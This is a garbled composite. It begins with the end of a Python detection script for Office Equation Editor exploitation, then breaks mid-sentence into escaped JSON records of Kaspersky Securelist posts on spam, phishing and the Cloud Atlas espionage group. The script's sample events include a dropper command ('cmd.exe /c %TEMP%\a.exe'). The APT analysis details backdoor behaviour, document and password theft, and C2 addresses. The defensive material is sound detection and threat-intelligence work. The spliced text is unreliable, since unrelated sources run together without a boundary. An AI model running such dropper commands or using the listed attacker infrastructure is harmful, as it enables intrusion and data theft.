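    {"UtcTime": "2022-03-01 09:14:40", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": EQNEDT, "CommandLine": '"EQNEDT32.EXE" -Embedding'},
    {"UtcTime": "2022-03-01 09:14:41", "ParentImage": EQNEDT,
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r"cmd.exe /c %TEMP%\a.exe"},
    {"UtcTime": "2022-03-01 09:20:00", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": PS, "CommandLine": "powershell.exe"},
    {"UtcTime": "2022-03-01 09:21:10", "ParentImage": WINWORD,
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 12288"},
])

if __name__ == "__main__":
    for when, child, rules in scan(SAMPLE_EVENTS):
        print(when, child, ",".join(rules))
```

The eqnedt32.exe rule is deliberately unconditional on the child: Equation Editor has no legitimate reason to create any process, so the rule needs no allow-list and keeps firing however the exploit's dropper is named. The Office rules do need tuning in practice (printing helpers such as splwow64.exe and add-in installers are common benign children), which is why the sample includes one such event as a negative case.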
The only difference between the two rankings is that ninth place among individual samples is occupied by Trojan-PSW.MSIL.Stealer.gen stealers.\n\n_TOP 10 malicious attachments in spam, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131613/06-en-spam-report-q3.png>))_\n\n#### Countries targeted by malicious mailings\n\nIn Q3, Mail Anti-Virus was most frequently triggered on the computers of users in Spain. This country's share again grew slightly relative to the previous reporting period, amounting to 9.55%. Russia climbed to second place, accounting for 6.52% of all mail attachments blocked from July to September. Italy (5.47%) rounds out the TOP 3, its share continuing to decline in Q3.\n\n_Countries targeted by malicious mailings, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131639/07-en-spam-report-q3.png>))_\n\nBrazil (5.37%) gained 2.46 p.p. and moved up to fourth position by number of Mail Anti-Virus triggerings. It is followed by Mexico (4.69%), Vietnam (4.25%) and Germany (3.68%). The UAE (3.65%) dropped to eighth place. Also among the TOP 10 targets are Turkey (3.27%) and Malaysia (2.78%).\n\n## Statistics: phishing\n\nIn Q3, the Anti-Phishing system blocked 46,340,156 attempts to open phishing links. A total of 3.56% of Kaspersky users encountered this threat.\n\n### Geography of phishing attacks\n\nBrazil had the largest share of affected users (6.63%). The TOP 3 also included Australia (6.41%) and Bangladesh (5.42%), while Israel (5.33%) dropped from second to fifth, making way for Qatar (5.36%).\n\n_Geography of phishing attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131707/08-en-spam-report-q3.png>))_\n\n### Top-level domains\n\nThe top-level domain most commonly used for hosting phishing pages in Q3, as before, was COM (29.17%). Reclaiming second place was XYZ (14.17%), whose share increased by 5.66 p.p. 
compared to the previous quarter. ORG (3.65%) lost 5.14 p.p. and moved down to fifth place, letting both the Chinese domain CN (9.01%) and TOP (3.93%) overtake it.\n\n_Top-level domain zones most commonly used for phishing, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131734/09-en-spam-report-q3.png>))_\n\nThe Russian domain RU (2.60%) remained the sixth most popular among cybercriminals in Q3, while the last four lines of the TOP 10 are occupied by the international domains NET (2.42%), SITE (1.84%), ONLINE (1.40%) and INFO (1.11%).\n\n### Organizations under phishing attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nGlobal internet portals (20.68%) lead the list of organizations whose brands were most often used by cybercriminals as bait. Online stores (20.63%) are in second place by a whisker. Third place, as in the last quarter, is taken by banks (11.94%), and fourth by payment systems (7.78%). Fifth and sixth positions go to the categories "Social networks and blogs" (6.24%) and "IMs" (5.06%), respectively.\n\n_Distribution of organizations whose users were targeted by phishers, by category, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131759/10-en-spam-report-q3.png>))_\n\nThe seventh line is occupied by online games (2.42%). Note that for the past two years websites in this category have featured in the TOP 10 baits specifically in the third quarter. 
Financial services (1.81%), IT companies (1.72%) and telecommunication companies (1.45%) round out the ranking.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn Q3 2021, Safe Messaging blocked 117,854 attempted redirects via phishing links in various messengers. Of these, 106,359 links (90.25%) were detected and blocked in WhatsApp messages. Viber accounted for 5.68%, Telegram for 3.74% and Google Hangouts for 0.02% of all detected links.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131830/11-en-spam-report-q3.png>))_\n\nOn WhatsApp, Safe Messaging detected an average of 900 phishing links per day during the quarter. There was a surge in scamming activity in this period, though \u2014 on July 12\u201316 the system blocked more than 4,000 links a day. This spike coincided with an increase in detections of the Trojan.AndroidOS.Whatreg.b Trojan, which registers new WhatsApp accounts from infected devices. 
We cannot say for sure what exactly these accounts get up to and whether they have anything to do with the rise in phishing on WhatsApp, but it is possible that cybercriminals use them for spamming.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png>)\n\n**_Dynamics of phishing activity on WhatsApp, Q3 2021_**\n\nAs for Telegram, phishing activity there increased slightly towards the end of the quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png>)\n\n**_Dynamics of phishing activity on Telegram, Q3 2021_**\n\n## Takeaways\n\nNext quarter, we can expect Christmas- and New Year-themed mailings. Ahead of the festive season, many people make purchases from online stores, a fact exploited by cybercriminals. Anonymous fake stores taking money for non-existent or substandard goods are likely to be a popular scamming method during this period. Also beware of fraudulent copies of big-name trading platforms \u2014 such sites traditionally mushroom ahead of the festive frenzy. Corporate users too should remain sharp-eyed \u2014 even a congratulatory e-mail seemingly from a partner may be phishing for confidential information.\n\nThe COVID-19 topic will still be hot in the next quarter. The fourth wave of the pandemic, vaccinations and the introduction of COVID passports in many countries will surely give rise to new malicious mailings. 
Also be on the lookout for websites offering compensation payments: if previous quarters are anything to go by, cybercriminals will continue to find new and enticing ways to lure their victims.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-01T12:00:26", "type": "securelist", "title": "Spam and phishing in Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2021-11-01T12:00:26", "id": "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "href": "https://securelist.com/spam-and-phishing-in-q3-2021/104741/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:29:15", "description": "\n\n## Quarterly highlights\n\n### Valentine's Day\n\nAs per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. 
The topics exploited by cybercriminals ranged from online flower shops to dating sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png>)\n\nBut most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim's payment details being sent to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png>)\n\n### New Apple products\n\nLate March saw the unveiling of Apple's latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.\n\n_Growth in the number of attempts to redirect users to phishing Apple sites before the presentation _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143724/apple-en.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png>)\n\n_Fake Apple ID login pages_\n\nScammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png>)\n\n### Fake technical support\n\nFake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. 
Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png>)\n\n_Fake \"Kaspersky Lab support service\" accounts_\n\nAll these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to the products of one company or another, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not have their issue resolved, they are likely to be defrauded as well.\n\n### New Instagram \"features\"\n\nLast year, we [wrote](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full \u2014 not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.\n\nCybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png>)\n\nAs usual in such schemes, the \"buyer\" is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png>)\n\n### Mailshot phishing\n\nIn Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. 
Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png>)\n\n### Financial spam through the ACH system\n\nIn Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png>)\n\n### \"Dream job\" offers from spammers \n\nIn Q3, we [registered spam messages](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/>) containing \"dream job\" offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the \"cloud service,\" the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). 
If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim's machine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png>)\n\n### Ransomware and cryptocurrency\n\nAs we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of \"sextortion\" \u2014 a topic we [wrote about last year](<https://securelist.com/spam-and-phishing-in-2018/93453/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png>)\n\nIn Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.\n\nThe fictitious employee, whose name varied from message to message, claimed to have found the victim's details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the \"employee\" happened to know that the victim was a well-off individual with a reputation to protect \u2014 for which a payment of 10,000 dollars in bitcoin was demanded.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png>)\n\nPlaying on people's fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. 
But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.\n\n### Malicious attacks on the corporate sector\n\nIn Q1, the [corporate sector of the Runet was hit by a malicious spam attack](<https://www.kaspersky.ru/blog/phishing-wave-shade/22251/>). The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png>)\n\nWe also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png>)\n\n### Attacks on the banking sector\n\nBanks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender's address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message \u2014 for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. 
The email itself stated that the bank had introduced some new security features that required an update of the account details to use.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png>)\n\nThe link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14144003/spam-world-en.png>)\n\nIn Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.\n\n_Proportion of spam in Runet mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143939/spam-russia-en.png>)\n\nPeak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143819/countries-source-en.png>)\n\nAs is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). 
The Top 10 is rounded off by Vietnam (2.18%).\n\n### Spam email size\n\n_Spam email size, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143628/spam-size.png>)\n\nIn Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2\u20135 KB messages fell to 8.27% (down 3.15 p.p.). 10\u201320 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20\u201350 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).\n\n### Malicious attachments: malware families\n\n_TOP 10 malicious families in mail traffic, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143654/families.png>)\n\nIn Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.\n\n### Countries targeted by malicious mailshots\n\n_Countries targeted by malicious mailshots, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143848/countries-victims-en.png>)\n\nFirst place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.\n\n## Statistics: phishing\n\nIn Q1 2019, the Anti-Phishing system prevented **111,832,308** attempts to direct users to scam websites. 
**12.11%** of all Kaspersky Lab users worldwide experienced an attack.\n\n### Attack geography\n\nIn Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.\n\n_Geography of phishing attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143915/map-en.png>)\n\nIn second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.\n\n**Country** | **%*** \n---|--- \nBrazil | 21.66 \nAustralia | 17.20 \nSpain | 16.96 \nPortugal | 16.81 \nVenezuela | 16.72 \nGreece | 15.86 \nAlbania | 15.11 \nEcuador | 14.99 \nRwanda | 14.89 \nGeorgia | 14.76 \n \n*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThis quarter, the banking sector remains in first place by number of attacks \u2014 the share of attacks on credit organizations increased by 5.23 p.p. 
against Q4 last year to 25.78%.\n\n_Distribution of organizations subjected to phishing attacks by category, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/20091310/companies-en-1.png>)\n\nSecond place went to global Internet portals (19.82%), and payment systems \u2014 another category that includes financial institutions \u2014 finished third (17.33%).\n\n## Conclusion\n\nIn Q1 2019, the average share of spam in global mail traffic rose by **0.06** p.p. to **55.97**%, and the Anti-Phishing system prevented more than **111,832,308** redirects to phishing sites, up **35,220,650** in comparison with the previous reporting period.\n\nAs previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away \u2014 on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.\n\nOn top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.", "cvss3": {}, "published": "2019-05-15T10:00:23", "type": "securelist", "title": "Spam and phishing in Q1 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-05-15T10:00:23", "id": "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "href": "https://securelist.com/spam-and-phishing-in-q1-2019/90795/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-12T19:33:22", "description": "\n\nAlso known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. 
We first reported [Cloud Atlas in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and we've been following its activities ever since.\n\nFrom the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor, mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png>)\n\n**Countries targeted by Cloud Atlas recently**\n\nCloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high-value targets.\n\nThe Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high-profile victims. These emails are crafted with Office documents that use malicious remote templates - whitelisted per victim - hosted on remote servers. We [described one of the techniques used by Cloud Atlas in 2017](<https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/>) and our colleagues at [Palo Alto Networks also wrote about it in November 2018](<https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/>).\n\nPreviously, Cloud Atlas dropped its \"validator\" implant named \"PowerShower\" directly, after exploiting the Microsoft Equation Editor vulnerability CVE-2017-11882 combined with CVE-2018-0802. 
During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second-stage modular backdoor that we disclosed [five years ago in our first blogpost about them](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and which remains unchanged.\n\n## Let's meet PowerShower\n\nPowerShower, named and previously disclosed by Palo Alto Networks in their blog post (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences between the two versions reside mostly in the anti-forensics features of the validator version of PowerShower.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png>)\n\nThe PowerShower backdoor - even in its later developments - takes three commands:\n\n**Command** | **Description** \n---|--- \n0x80 (Ascii \"P\") | It is the first byte of the magic PK. The implant saves the received content as a ZIP archive under %TEMP%\\PG.zip. \n0x79 (Ascii \"O\") | It is the first byte of \"On resume error\". The implant saves the received content as a VBS script under \"%APPDATA%\\Microsoft\\Word\\\\[A-Za-z]{4}.vbs\" and executes it using Wscript.exe \nDefault | If the first byte matches neither 0x80 nor 0x79, the content is saved as an XML file under \"%TEMP%\\temp.xml\". After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX. \nAfter executing the commands, the script deletes \"%TEMP%\\temp.xml\" and sends the content of \"%TEMP%\\pass.txt\" to the C2 via an HTTP POST request. 
\n \nA few modules deployed by PowerShower have been seen in the wild, such as:\n\n * A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;\n * A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;\n * A password stealer module which uses the open-source tool LaZagne to retrieve passwords from the infected system.\n\nWe haven't yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group's second-stage backdoor documented in our [article back in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## And its new friend, VBShower\n\nDuring its recent campaigns, Cloud Atlas used a new \"polymorphic\" infection chain which no longer relies on PowerShower directly after infection, but instead executes a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.\n\n * A backdoor that we name **VBShower** which is polymorphic and replaces PowerShower as a validator;\n * A tiny launcher for VBShower;\n * A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.\n\nThis \"polymorphic\" infection chain is intended to defeat IoC-based defences: each sample is unique to its victim, so it cannot be found on the host by searching for a known file hash.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png>)\n\nThe VBShower backdoor has the same philosophy as the validator version of PowerShower. 
Its aim is to complicate forensic analysis by trying to delete all the files contained in \"%APPDATA%\\\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".\n\nOnce these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and then, every hour, tries to fetch a VBS script from the remote server via HTTP and execute it.\n\nAt the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second-stage modular backdoor, which communicates with a cloud storage service via WebDAV.\n\n## Final words\n\nCloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.\n\nUnlike many other intrusion sets, Cloud Atlas hasn't chosen to use open-source implants during its recent campaigns, in order to be less discriminating. 
More interestingly, this intrusion set hasn't changed its modular backdoor, even [five years after its discovery](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## IoCs\n\n#### Some emails used by the attackers\n\n * infocentre.gov@mail.ru\n * middleeasteye@asia.com\n * simbf2019@mail.ru\n * world_overview@politician.com\n * infocentre.gov@bk.ru\n\n#### VBShower registry persistence\n\n * Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\n * Value : wscript //B \"%APPDATA%\\\\[A-Za-z]{5}.vbs\"\n\n#### VBShower paths\n\n * %APPDATA%\\\\[A-Za-z]{5}.vbs.dat\n * %APPDATA%\\\\[A-Za-z]{5}.vbs\n * %APPDATA%\\\\[A-Za-z]{5}.mds\n\n#### VBShower C2s\n\n * 176.31.59.232\n * 144.217.174.57", "cvss3": {}, "published": "2019-08-12T10:00:58", "type": "securelist", "title": "Recent Cloud Atlas activity", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-08-12T10:00:58", "id": "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "href": "https://securelist.com/recent-cloud-atlas-activity/92016/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-14T15:27:23", "description": "\n\n## Figures of the year\n\nIn 2021:\n\n * 45.56% of e-mails were spam\n * 24.77% of spam was sent from Russia with another 14.12% from Germany\n * Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails\n * The most common malware family found in attachments were Agensla Trojans\n * Our Anti-Phishing system blocked 253 365 212 phishing links\n * Safe Messaging blocked 341 954 attempts to follow phishing links in messengers\n\n## Trends of the year\n\n### How to make an unprofitable investment with no return\n\nThe subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. 
Cybercriminals wanted in on this trend and tried to make their "investment projects" look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That's how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they'd invite the "customer" to have a consultation with a specialist in order to come across as legit. The outcome would still be the same: the investor would receive nothing in return for giving their money to the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01.png>)\n\nSimilar schemes targeting English speakers were also intensively deployed online. Scammers encouraged investment in both abstract securities and more clearly outlined projects, such as oil production. In both cases, victims received nothing in return for their money.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02.png>)\n\nAnother trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk involved for the investor, as well as the status of the company they were posing as. In order to make sure the investors didn't think the process sounded too good to be true, victims were invited to take an online test or fill out an application form which would ostensibly take some time to be "processed".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png>)\n\n### Films and events "streamed" on fake sites: not seeing is believing!\n\nOnline streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. 
